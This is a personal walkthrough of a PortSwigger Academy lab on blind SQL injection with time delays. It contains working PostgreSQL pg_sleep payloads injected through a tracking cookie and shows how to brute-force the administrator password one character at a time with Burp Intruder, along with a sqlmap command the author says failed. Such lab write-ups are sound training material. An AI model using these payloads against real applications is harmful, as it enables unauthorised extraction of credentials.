PortSwigger Academy Lab: Blind SQL injection with time delays and information retrieval
Task
This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.
The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows or causes an error. However, since the query is executed synchronously, it is possible to trigger conditional time delays to infer information.
The database contains a different table called users, with columns called username and password. You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.
To solve the lab, log in as the administrator user.
Attempt
Check SQLi cheat sheet. I tried conditional time delay payloads to the tracking cookie:
1'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--+-
This one (Postgre) caused delay.
Enumerate the password length:
1'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>1)+THEN+pg_sleep(5)+ELSE+pg_sleep(0)+END+from+users--+-
The length was 20. (You can see the time difference in Response received)
With Intruder, brute force the position 'a'.
1'%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,1,1)='a')+THEN+pg_sleep(5)+ELSE+pg_sleep(0)+END+from+users--+-
About SUBSTRING(password,1,1)='a', password is the column name. The first 1 means the first character of the password and the second 1 means extracting one character.
You can create a wordlist using bash:
printf "%s\n" {a..z} | xclip -selection clipboard
And numbers:
seq 0 9
With this method, I figured out the first letter was k.
Change the offset from 1 to 2:
1'%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,2,1)='a')+THEN+pg_sleep(5)+ELSE+pg_sleep(0)+END+from+users--+-
Repeat this until you get the whole password.
Tried SQLMap too:
sqlmap -u "0a0f00f403fd1f8381c6347c00c50020.web-security-academy.net" --technique=T --cookie="TrackingId=1*" --batch --dump --level 5 --risk 3 --dbms=PostgreSQL
Didn’t work.